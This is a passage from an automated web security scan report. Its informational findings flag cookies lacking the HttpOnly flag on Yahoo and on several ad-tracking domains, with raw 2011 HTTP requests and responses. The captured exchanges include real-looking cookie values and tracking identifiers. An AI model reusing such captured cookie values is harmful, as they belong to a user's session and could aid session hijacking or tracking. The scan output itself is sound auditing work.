myc_s=d=QGvxRadNOKG8XKwa8ocnF6G2EkYtnSK1JhnXBqwSd7W6rHm3SMukGvXcI69PDCPnjJ8BKorvMUKNuoVs9NrERQm2BxPLVIL0hZOEeM5Okz9yB3aSvYHXrtom_ss6dGF.d7VMBaGuQ539iqstNHeGpPJL2JYypeP57cbPGh89gWUsYtMS2sVWtWbFdRfImfJWM67.rG5eXFwtuElDkOwL_XSnCt.O1CY9d88IRNoLTipg394Mlz0fjUTGGT3EIDHkop6bIiAmrHkxjMUeUJrXADkvNbsZMUTd6yl9_CIvICKig0RhjM8mIhHvgEKnUSPgVe2KLlAgLdbyBRMc835t_QtLlgEV6IgkX9AZ0c9jYyIll8ACpApVFI7hZoVELh3nVL7WI8mMNzLpF3GpADG5krCCTfjKL0bBYyQqQ8zwSa9vH_vBPwiVGZZrVu5YoWjnFmFz0w6KEk7C4NCFxAHBUtmLHZaYM8S4JcDDxKHpcuPYck8X8tl3u7URa6Hp..P1duvOGbKjNNVK6bSbmkiV_XIdG_K5FEHWdiM3BtpRbOByeS5JTumGEKZ5Aupg05FB6Wp93c0UzN.lfs9a2Chc5.xUU2GAhmgfI5PgBUdXXpq1fDnAWK6TH2ReUn0jNssk2wFER..0vT.7aASiI8_cubdVMoboRdOvMieabUHLZen2WXcyKEPIyYZ_sCUnI1c97HU24J8J7f889glTKWtN&v=2; path=/; domain=my.yahoo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /e/df HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
Content-Length: 304
Origin: http://my.yahoo.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=wl5nAgw8OKEn_MnPELISjekFopwmUV6I0RVCQ6cf3P7WctxzgNQb6r6e4.AVwh2DrKWH6cnP1G79CGbgy4_dRSBXvHHADyYw1sZORkUfyjjj.NBdpSofp07kjBZVrBsnS0t6EWOCBOo8ZKNbVbgIDBcvzBT0VmnMcmnekdBDGm3S5GWc0uY0MEc7j_4gUC09ScPNrDW9.Pfx6s7MNCk8CuKpUqJvqZGA0LYBfmYcVRXhHYyY6aGNtUUuDS1x9pSoeE8Ig0cHtBAuqIOqRcBxu99GEjfM_TQ3W6JFTPYrnw82cQh04tF0e2jrjjlIaWAD8X58pxD.XSq7bvVUgNV2f5AND1MTajMspX0qIyDWzeQNP15Vvcg_NOwUfXXwmHi7QtFFG5o_C2IiverRBCtdbhLNmq99paOoeV6n_0DLETv2MfUHeC2Epfn93D6d.HIl4mwZE_yYPtgYDgO7HzVY24e0GHHLdJL9q1f5UXqjS8oLL2IGxUg.sE0BhIrT1SHgdvXnG8q4Uq9.nDj.JHOUEF0TcEyxyedTMX30CV2difMivJ6pi6ONlLZPryKJ2R5Hc6aeIj2BoGc.h_XMFOpJ0ppNA5v_XMNYh9vXIJqnAs60yNTxabQxUF23vn.ws6wObybT_UPb6JJsC9GDkqRYjXmnx45HaRp.vxvp6FzWBWLOk9b_nfo2VXW3ANyKpGSdlVYb9.iXvrDjkfSJred4&v=2; MYTMI=8

_crumb=O2424dQlFYL1lvSkhHTkM.&_mode=json&_json=%5B%7B%22_action%22%3A%22show%22%2C%22_container%22%3A0%2C%22_id%22%3A%22a3190e%22%2C%22_tags%22%3A%5B%5D%2C%22_txnid%22%3A2%7D%2C%7B%22_action%22%3A%22s
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:10:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVkbjZxNWQ2dDA3OGIiO3M6MjoibXQiO2k6MTMwNzk2MzQ1Njt9; expires=Thu, 13-Jun-2013 11:10:56 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:10:56 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Sun, 13-Jun-2010 11:10:56 GMT; path=/; domain=my.yahoo.com
Set-Cookie: myc_s=d=QGvxRadNOKG8XKwa8ocnF6G2EkYtnSK1JhnXBqwSd7W6rHm3SMukGvXcI69PDCPnjJ8BKorvMUKNuoVs9NrERQm2BxPLVIL0hZOEeM5Okz9yB3aSvYHXrtom_ss6dGF.d7VMBaGuQ539iqstNHeGpPJL2JYypeP57cbPGh89gWUsYtMS2sVWtWbFdRfImfJWM67.rG5eXFwtuElDkOwL_XSnCt.O1CY9d88IRNoLTipg394Mlz0fjUTGGT3EIDHkop6bIiAmrHkxjMUeUJrXADkvNbsZMUTd6yl9_CIvICKig0RhjM8mIhHvgEKnUSPgVe2KLlAgLdbyBRMc835t_QtLlgEV6IgkX9AZ0c9jYyIll8ACpApVFI7hZoVELh3nVL7WI8mMNzLpF3GpADG5krCCTfjKL0bBYyQqQ8zwSa9vH_vBPwiVGZZrVu5YoWjnFmFz0w6KEk7C4NCFxAHBUtmLHZaYM8S4JcDDxKHpcuPYck8X8tl3u7URa6Hp..P1duvOGbKjNNVK6bSbmkiV_XIdG_K5FEHWdiM3BtpRbOByeS5JTumGEKZ5Aupg05FB6Wp93c0UzN.lfs9a2Chc5.xUU2GAhmgfI5PgBUdXXpq1fDnAWK6TH2ReUn0jNssk2wFER..0vT.7aASiI8_cubdVMoboRdOvMieabUHLZen2WXcyKEPIyYZ_sCUnI1c97HU24J8J7f889glTKWtN&v=2; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 8077

[{"state":{"view":"default","defer":false,"collapsed":0},"prefs":{"isc":0,"_mc":0},"html":"<div class=\"login-wrapper\"> <div class=\"logo-wrapper\"> <div class=\"logo-icon\"><\/div> <div class=\"shad
...[SNIP]...

13.129. http://my.yahoo.com/e/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/e/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

U_mtupes=YToyOntzOjE6ImIiO3M6MTM6IjlrbnBhdTU2dmJzYmciO3M6MjoibXQiO2k6MTMwNzk2NDAyNTt9; expires=Thu, 13-Jun-2013 11:20:25 GMT; path=/; domain=my.yahoo.com
U_mtupes=deleted; expires=Sun, 13-Jun-2010 11:20:24 GMT; path=/; domain=my.yahoo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /e/js?_action=show&_subAction=promoCntnt&_container=0&_type=promo&_txnid=4&_crumb=O2424dQlFYL1lvSkhHTkM.&_mode=json HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEABLXxAAV%2BUQAC1H; myc_s=d=QGvxRadNOKG8XKwa8ocnF6G2EkYtnSK1JhnXBqwSd7W6rHm3SMukGvXcI69PDCPnjJ8BKorvMUKNuoVs9NrERQm2BxPLVIL0hZOEeM5Okz9yB3aSvYHXrtom_ss6dGF.d7VMBaGuQ539iqstNHeGpPJL2JYypeP57cbPGh89gWUsYtMS2sVWtWbFdRfImfJWM67.rG5eXFwtuElDkOwL_XSnCt.O1CY9d88IRNoLTipg394Mlz0fjUTGGT3EIDHkop6bIiAmrHkxjMUeUJrXADkvNbsZMUTd6yl9_CIvICKig0RhjM8mIhHvgEKnUSPgVe2KLlAgLdbyBRMc835t_QtLlgEV6IgkX9AZ0c9jYyIll8ACpApVFI7hZoVELh3nVL7WI8mMNzLpF3GpADG5krCCTfjKL0bBYyQqQ8zwSa9vH_vBPwiVGZZrVu5YoWjnFmFz0w6KEk7C4NCFxAHBUtmLHZaYM8S4JcDDxKHpcuPYck8X8tl3u7URa6Hp..P1duvOGbKjNNVK6bSbmkiV_XIdG_K5FEHWdiM3BtpRbOByeS5JTumGEKZ5Aupg05FB6Wp93c0UzN.lfs9a2Chc5.xUU2GAhmgfI5PgBUdXXpq1fDnAWK6TH2ReUn0jNssk2wFER..0vT.7aASiI8_cubdVMoboRdOvMieabUHLZen2WXcyKEPIyYZ_sCUnI1c97HU24J8J7f889glTKWtN&v=2

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6IjlrbnBhdTU2dmJzYmciO3M6MjoibXQiO2k6MTMwNzk2NDAyNTt9; expires=Thu, 13-Jun-2013 11:20:25 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:20:25 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Sun, 13-Jun-2010 11:20:24 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 166

[{"_status":1,"html":null,"_error":"We noticed you may have signed in or signed out in another window. Click OK to reload your page.","_errorCode":2048,"_txnid":"4"}]

13.130. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QW4uQO1018RL|O1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.131. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QW4uQO1018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.132. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QW4uQO1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.133. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/5941/13464/26379-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=5941/13464; expires=Mon, 13-Jun-2011 12:21:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=13464^4; expires=Tue, 14-Jun-2011 04:59:59 GMT; max-age=74282; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/5941/13464/26379-2.js?cb=0.7753647894132882 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; ses2=13464^2; cd=false; lm="13 Jun 2011 11:13:38 GMT"; rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%262373%3D1%263810%3D1%262374%3D1; rdk=5941/13464; rdk9=0; ses9=13464^2

Response

13.134. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/5941/13464/26379-9.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=5941/13464; expires=Mon, 13-Jun-2011 12:21:18 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses9=13464^4; expires=Tue, 14-Jun-2011 04:59:59 GMT; max-age=74321; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/5941/13464/26379-9.js?cb=0.601756411138922 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; lm="21 May 2011 12:38:06 GMT"; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; cd=false; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=5941/13464; ses2=13464^1; rpb=3580%3D1%264222%3D1%266811%3D1%265421%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1

Response

13.135. http://ox-d.sbnation.com/w/1.0/ajs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ox-d.sbnation.com
Path:	/w/1.0/ajs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OX_u=bd25819b-0149-45fa-ad24-5911a28c4ab5; Version=1; Expires=Tue, 12 Jun 2012 11:01:36 GMT; Max-Age=31536000; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/ajs?o=700820584&auid=20336&tid=2,8,17&res=1920x1200x32&plg=swf,sl,shk&ch=UTF-8&tz=300&c.team=dallas-mavericks&c.entry_type=story&c.region=dallas&url=http%3A//www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship&cb=700820584 HTTP/1.1
Host: ox-d.sbnation.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-853758375-1305746649439; OAID=4b24811b2bad0c1235f0fb9f9e199204

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=bd25819b-0149-45fa-ad24-5911a28c4ab5; Version=1; Expires=Tue, 12 Jun 2012 11:01:36 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.7.2 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://u.openx.net/w/1.0/sc?r=http%3A%2F%2Fox-d.sbnation.com%2Fw%2F1.0%2Fajs%3Fo%3D700820584%26auid%3D20336%26tid%3D2%2C8%2C17%26res%3D1920x1200x32%26plg%3Dswf%2Csl%2Cshk%26ch%3DUTF-8%26tz%3D300%26c.team%3Ddallas-mavericks%26c.entry_type%3Dstory%26c.region%3Ddallas%26url%3Dhttp%253A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship%26cb%3D700820584
Date: Mon, 13 Jun 2011 11:01:36 GMT
Content-Length: 0
Connection: close

13.136. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Wed, 05-Jun-2041 11:23:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.137. http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/A09801/b3/0/3/1008211/172737971.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EuhOQMMpjaxq2F29/xUY651hLZPPu6KLEhAA886n2e1NMyNdTd0q7tfEV6W8KYgoaC/NzJwIw+BkVbQUlyrEgVUeakyMmtzOjwGpMueNHbhQOUYQcmu+Rp/cDp+Y0GRZki85xiNnO2gL5JKomkldK1kJfL7yLCbCRJ9QWbkENIix0WUcvmOaTynbtLJXgB1O8T4TrVVI9X6xXjztB2u+fu6LAvYXEVFWWI0Y/4zlDThaAxfF5u49CV6G+4ESJ+X16acbHPlK04sKAdRmjyoU9DXU5ZKptBktG7P/hvDFQRTVmSM1vEzZxRO8ewZnOsnyLLyIpCVtnm9OScw/ee7AeT6UnuJsR2xYIQNF2Kor6bTyo8iFiAeUukbKYXskQnXnt4Y0kcxl4UzqDcBTQCasrXgbPK7n6YPC9P5j/hljSS81dTj9xqWlGSl4lWV5BbLtlTpCzYOvxK1uvl8vDuPwDkt6qm3dopndnJpIL1jv6uXn9BQCJXboXu5U/ELaWmENtdMw7m/X0lC08FJ7UT6uiIFKEFUat9yL2DJbIhDCK7dWsRXXt8aNvEFxC01iQZl/oYm0XM1WAyGmQOkSM/qWOQyq7FLLXupN2VXNWbG+6Ypw1wY341IkbPsSDI+4D4I2a8V75YusKVQhm1RGTex; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:20:05 GMT; Path=/
rtc_mGyF=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:20:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.138. http://pix04.revsci.net/D10889/a1/0/3/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10889/a1/0/3/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MmhOXMMpjaBv3Bh9uxc4xrMriSJbZsgJmILMDUmufM9tNd4heJ7St7GX0DL0+fSLUTLoEm+Lgqh8P1UFkgJne7ZsOV6Ta1iuv1MzhmYhirHc/Hg4emnRkQiJyODMbw1LI67VP6jyT9H+Vu8imVtfewvZBiSnz4xalQVQYQWZHho33J8VSL//eihmZmQwg8GB3pzT6R4US7aShMFmG4Cin3im/BWv6yFReAkWBsEPdpYNcWyvDqqrnxlZZDKHJC4T+B47iIv/HJ1MLMTKLDPZ0QU3pMIyAxsUIWT8mICGsDOf2mdhqaEBzvYBOSJj9WnbTMOix6NPe37+fqefwtcfaARBaQZQIiTyDUCPDwQBhpvtUBfjAS8kaXKqSkMc2rM9wWxbBSQF18ohs6P3M3PT0nfrVOCI5pCn/YlRkL9l0AuLM0tBin66DdW1xidw+wfkpX0tcTJPdWRpgX4sB0ykXVT/4UW7gErmYyY7iae28vg/n6E+TYAqMj344RefGov1AxYuCtpwjFkb+kFuXZvJxKF9y4HI6U4skleEX2jNq8+U64NHXYZ1k3b+2I8t8dmWFS3esgM0XOsP8Ya4i4B8d6luAC1h+RzMIm9OX6PGya/FFIKR6b5bSP4O5pRVwPQBtE7owiVQ3MF3r1cv3F7Oyw=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:47 GMT; Path=/
